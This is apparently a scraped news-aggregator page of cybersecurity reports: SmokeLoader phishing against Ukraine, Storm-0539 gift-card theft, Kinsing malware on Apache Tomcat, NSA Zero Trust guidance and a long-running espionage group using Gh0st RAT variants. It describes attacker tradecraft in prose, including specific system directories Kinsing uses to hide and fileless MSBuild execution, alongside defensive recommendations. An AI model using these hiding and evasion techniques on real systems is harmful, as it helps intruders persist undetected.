CYBERSECURITY / DEFENSE / INTELLIGENCE

  • The platform could be a popular remote-work solution for Space Systems Command.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The United States is surrendering ground to Russia and China’s propaganda machines. That has key officials increasingly worried.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The MITRE Corporation has revealed that the cyber attack targeting the not-for-profit company towards late December 2023 by exploiting zero-day flaws in Ivanti Connect Secure (ICS) involved the actor creating rogue virtual machines (VMs) within its VMware environment. “The adversary created their own rogue VMs within the VMware environment, leveraging compromised vCenter Server access,” MITRE

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The House will vote on a proposal to study the question as part of the 2025 defense authorization bill.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Threat actors have been observed making use of fake websites masquerading as legitimate antivirus solutions from Avast, Bitdefender, and Malwarebytes to propagate malware capable of stealing sensitive information from Android and Windows devices. “Hosting malicious software through sites which look legitimate is predatory to general consumers, especially those who look to protect their devices

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • In multiple aggressive phishing attempts, the financially motivated organization UAC-0006 heavily targeted Ukraine, utilizing ZIP and RAR attachments to distribute SMOKELOADER malware.

    The most recent attacks involve emails that carry Microsoft Access files and ZIP archives that, when opened, install weaponized malware on compromised systems, such as RMS and TALESHOT.

    The government computer emergency response team of Ukraine, CERT-UA, observed this notable activation of the financially motivated group UAC-0006.

    Overview Of Recent Activities For UAC-0006

    According to CERT-UA reports, attackers have launched at least two campaigns to disseminate the SMOKELOADER malware as of May 21, 2024.

    ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

    The SmokeLoader malware mostly affects Windows-based devices. SmokeLoader tries to install other malware (such as ransomware, cryptominers, or password stealers) on a computer after it has infected it.Β 

    It might also corrupt files, steal confidential information, and create other problems.

    The recent attacks include emails with a ZIP archive that may include the following:

    • The.IMG file contains EXE files.
    • Microsoft Access (ACCDB) documents with macros that guarantee the PowerShell command to download and launch the EXE file is executed.

    As before, RMS, TALESHOT, and other malicious applications are loaded into the machine following a main attack that is successful.

    Several hundred compromised PCs are currently in the bot network. CERT-UA anticipates an increase in fraud via remote banking systems shortly.

    Recommendation

    Therefore, it is advised that company managers take note of the need to enhance the security of automated accounting workspaces as soon as possible. 

    This can be done by reviewing the offered signs of compromise and ensuring that the appropriate policies and protection mechanisms are used.

    SOC Prime Platform provides curated and tested detection algorithms to help defenders avert attacks related to the UAC-0006 adversary activity detailed in the most recent CERT-UA notice.Β 

    Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

    The post Hackers Weaponizing Microsoft Access Documents To Execute Malicious Program appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Gift cards are attractive to hackers since they provide quick monetization for stolen data or compromised systems.

    Reselling gift cards is simple, and they can also be converted into money, which makes them a comparatively risk-free means of ensuring threat actors benefit greatly from their illegal undertakings.

    Microsoft cybersecurity analysts recently discovered that the gift card system is targeted by a threat group known as Storm-0539 (aka Atlas Lion).Β 

    It adjusts its methods to be relevant to changes taking place across retail, payment, and other industries associated with it.

    Storm-0539’s illicit gift card theft ventures are coordinated via encrypted channels and underground forums.

    ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

    Technical Analysis

    This involves exploiting technological vulnerabilities and conducting social engineering campaigns that compromise gift card portals, allowing the stolen cards to be converted into untraceable cash.

    Compared to threat actors targeting scalable attacks for quick profits, this actor stands out due to the fact that they quietly steal through gift cards.

    Storm-0539 is a Morocco-based threat group whose activities escalate towards major holidays such as Christmas, New Year’s Day. 

    Their invasion trials accounted for 30% to 60% of the total during summer, autumn, and winter in 2023-2024.

    Storm-0539 is a group that has adapted to modern payment card fraud, among other tactics.

    These include phishing, smishing, device registration for MFA bypass, and third-party access used to hack cloud identities and gift card portals of retailers, brands, and restaurants.Β 

    Storm-0539 intrusion lifecycle (Source – Microsoft)

    They become more interested in how they can use their profound understanding of the cloud to successfully carry out gift card issuance schemes targeting staff with access privileges rather than relying on malware.

    Storm-0539’s reconnaissance and ability to leverage cloud environments resemble those of nation-state threat actors, illustrating how espionage methods currently influence financially motivated threat actors.

    Storm-0539 behaves like state-sponsored advanced hacking groups, focusing on cloud software, identities, and access rights to compromise the gift card printing process instead of end-users.

    They pretend to be genuine organizations that use free cloud resources to hide their operation.

    Their tools of deception involve typosquatting websites mimicking U.S. non-profits through which they can download authentic 501(c)(3) IRS letters and then approach sponsored cloud services for charities using them.

    The combination of nation-state tradecraft with financial motives represents new threats from actors like Storm-0539 and Octo Tempest.

    The group’s efficiency in creating free trials and compromising cloud services allows them to launch targeted operations with minimal costs.

    Recommendations

    Here below we have mentioned all the recommendations provided:-

    • Token protection and least privilege access
    • Phishing-resistant MFA
    • Adopt a secure gift card platform and implement fraud protection solutions
    • Require a secure password change when user risk level is high
    • Educate employees
    • Reset passwords for users associated with phishing and AiTM activity
    • Enable zero-hour auto purge (ZAP) in Microsoft Defender for Office 365
    • Update identities, access privileges, and distribution lists to minimize attack surfaces

    Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

    The post Microsoft Warns Of Storm-0539’s Aggressive Gift Card Theft appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The scalability and flexibility of cloud platforms recently boosted the emerging trend of cryptomining attacks in the cloud.

    Unlike on-premises infrastructure, whereby it is difficult to scale up resources, cloud environments enable attackers to deploy resources for cryptomining rapidly, making exploitation easier.Β 

    One of the most common threats of cloud cryptomining is “Kinsing malware.”

    Cybersecurity researchers recently discovered that Kinsing malware has been actively attacking the Apache Tomcat server with vulnerabilities.

    ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

    Technical Analysis

    Malware families such as Kinsing, a longstanding malware family, specialize in Linux-based cloud infrastructure and aim to gain unauthorized access by exploiting vulnerabilities.Β 

    In most cases, hackers behind Kinsing use compromised systems to install backdoors or cryptominers.

    Kinsing once it infects a system, uses system resources for cryptomining, leading to increased costs and reduced server performance.

    The latest findings show that the group has been attacking Apache Tomcat servers through Kinsing malware and hiding in filesystems, such as their persistence, by using any innocent file location.

    These campaigns use containers and servers’ flaws to install malicious backdoors and cryptominers.

    In this instance, many servers were infected simultaneously within one environment, including an Apache Tomcat server with severe vulnerabilities.

    Apache Tomcat, an open-source server that publishes static content to the public, is a tempting target for Kinsing perpetrators.

    To remain hidden, the Kinsing malware uses uncommon tricks to appear as a file on any system in places where one would never think of looking.

    It is found in four areas and here below we have mentioned them:-

    • /var/cache/man/cs/cat1/ (where the user command manpages are usually)
    • /var/cache/man/cs/cat3/ (where the library function manpages are usually)
    • /var/lib/gssproxy/rcache/ (no description)
    • /var/cache/man/zh_TW/cat8/ (here experts find sysadmin commands, but amongst them, there’s also a Taiwan/Chinese directory structure added)

    The assumption is that defenders rarely take a critical look at such locations for malicious files due to using the ‘man’ or ‘manual’ page directories and dummy locale folder, consequently making them ideal hiding spots for Kinsing.

    To evade discovery, the Kinsing malware is hidden within areas where legitimate system files are usually found.

    Attackers increase the chances of their malware being unnoticed on compromised systems by using such innocent-looking routes.

    The detected malicious file was not new, and it was first seen in China in late 2022.Β 

    However, this specific attack on the Tomcat server began in mid-2023 with file creation dates from June to July 2023 over a year of an undetected malicious operation. 

    The malware uses old version 6.12.2 of XMRig cryptominer, which mines privacy-focused Monero cryptocurrency. GitHub already has the current version 6.21.2 for downloading.

    Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

    The post Kinsing Malware Attacking Apache Tomcat Server With Vulnerabilities appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Zero Trust Maturity measures the extent to which an organization has adopted and implemented the Zero Trust security model.Β 

    It calculates how fully a company has adopted Zero Trust’s foundational concepts, such as stringent authentication of each user, device, and application.

    Recently, the NSA released guidance on Zero Trust Maturity to secure the application from attackers.

    Guidance On Zero Trust Maturity

    The NSA released a Cybersecurity Information Sheet on advancing Zero Trust maturity for the application and workload pillar.Β 

    It provides recommendations for progressively achieving “never trust, always verify” capabilities, such as securing applications from unauthorized access and continuously monitoring workloads, under a comprehensive Zero Trust framework.Β 

    ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

    The goal is to continually mature cybersecurity protections, responses, and operations over time through Zero Trust implementation efforts.

    NSA’s Dave Luber stated:-

    “This guidance disrupts malicious cyber activity by applying granular access control and visibility to applications and workloads in modern networks. Implementing Zero Trust better secures sensitive data, apps, assets, and services.” 

    The CSI notes applications are programs and services executing on-prem or in cloud, while workloads are standalone solutions or coupled processing components performing mission functions, the two are mutually dependent under Zero Trust.

    Application security prevents exceptions to an app or system’s security policies.

    The application/workload Zero Trust pillar secures access at the application layer by integrating user, device, network, and environment capabilities to prevent unauthorized access or tampering with critical processes/services. 

    In advanced ZT, users strongly authenticate to apps and networks, while apps have reduced attack surfaces and least privilege controls.

    Workloads dynamically segregate components with granular access rules between them. 

    Key capabilities include application inventory, secure development/integration, software risk management, resource authorization/integration, and continuous monitoring/authorizations. 

    This enhances visibility, reduces risks, and mitigates application threats under Zero Trust.

    Application and workload pillar maturity (Source - Defense.gov)
    Application and workload pillar maturity (Source – Defense.gov)

    The National Security Agency (NSA) has been actively helping the Department of Defense (DoD) agencies pilot and implement the Zero Trust architectures on their networks.

    At the same time, the agency is also developing detailed guidelines for incorporating fundamental Zero Trust principles and models into company-wide system designs.

    Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

    The post NSA Releases Guidance On Zero Trust Maturity To Secure Application From Attackers appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Hackers target military and government networks for varied reasons, primarily related to spying, which involves interference in the functioning of critical infrastructure. 

    This is mainly because these networks hold sensitive data and command systems that if tampered with can be a great blow to national security through the collection of intelligence information or even gaining an upper hand in times of war.

    Bitdefender Labs recently analyzed a chain of cyber-attacks on top-flight organizations in South China Sea countries, revealing a previously unknown threat actor who probably acted at China’s command.Β 

    This investigation took several years and involved at least eight military and government victims from 2018, who used different methods and tools, such as Gh0st RAT iterations and .NET payloads, which can be likened to a cyber espionage museum.Β 

    ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

    Technical Analysis

    The most unsettling aspect is that attackers repeatedly got back inside systems through weak passwords or failing to update them.

    Meanwhile, even after comparing numerous artifacts, it was impossible to determine their over-five-year-long activities, assuming they were made by any known state actors.Β 

    This was a complicated attribution for “Unfading Sea Haze.” As the researchers found no match in their investigation with known actors and due to this they labeled this group as new.

    Their emphasis on South China Sea targets and employment of Gh0st RAT variants suggest investigating their Chinese links.Β 

    An APT41 technique involving SharpJSHandler that had some commonalities but no other resemblance indicated shared practices within the Chinese cyber ecosystem.

    These hints show an advanced threat actor who may have ties to China. Consequently, more research is needed.

    Unfading Sea Haze, however, managed to regain access via spear-phishing emails containing malicious ZIP archives with LNK files posing as documents.Β 

    The second one had long evasion comments while running, checking on and bypassing ESET processes. It was a SerialPktdoor backdoor payload.

    More recent ones have replicated Microsoft Defender installation or relied on political themes embedding LNK files for fileless attacks triggered by MSBuild to make it possible to run code completely from remote SMB servers in memory with no traces left behind on victims’ computers.Β 

    This was enabled by the smart use of legitimate tools such as MSBuild to remain hidden.

    Persistence was a matter of choosing scheduled tasks that used names from executable files, which the attackers preferred. 

    They began with Gh0st RAT versions such as SilentGh0st and InsidiousGh0st for several years before moving to modular forms like FluffyGh0st and leveraging fileless techniques via MSBuild.exe and remote shares.Β 

    The evolution and different variations of the Gh0st RAT (Source – BitDefender)

    These included browser data stealers aimed at Chrome, Firefox, Edge, USB, WPD monitoring, and keyloggers.Β 

    Messaging apps were targeted with compression tools for manual data gathering on recent files.Β 

    This is evidenced by exfiltration moving from using DustyExfilTool customized into curl on TLS to FTP over changing frequent credentials assumed to evolve their operational security posture.

    All this shows these spies wanted to engage in information collection activities.

    Recommendations

    Here below we have mentioned all the recommendations:-

    • Vulnerability Management
    • Strong Authentication
    • Proper Network Segmentation
    • Multilayered Defense
    • Network Traffic Monitoring
    • Effective Logging
    • Detection and Response
    • Collaboration and Information Sharing
    • Advanced Threat Intelligence

    Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

    The post Chinese Hackers Stay Hidden On Military And Government Networks For Six Years appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ